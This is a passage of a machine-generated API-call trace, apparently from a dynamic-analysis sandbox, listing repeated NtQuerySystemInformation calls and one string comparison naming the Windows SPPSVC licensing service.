(SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x28, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x28, ResultLength=0x0) [0273.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccf0, Length=0x20, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaa0, Length=0x28, ResultLength=0x0) [0273.770] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0273.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0273.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.771] NtQuerySystemInformation 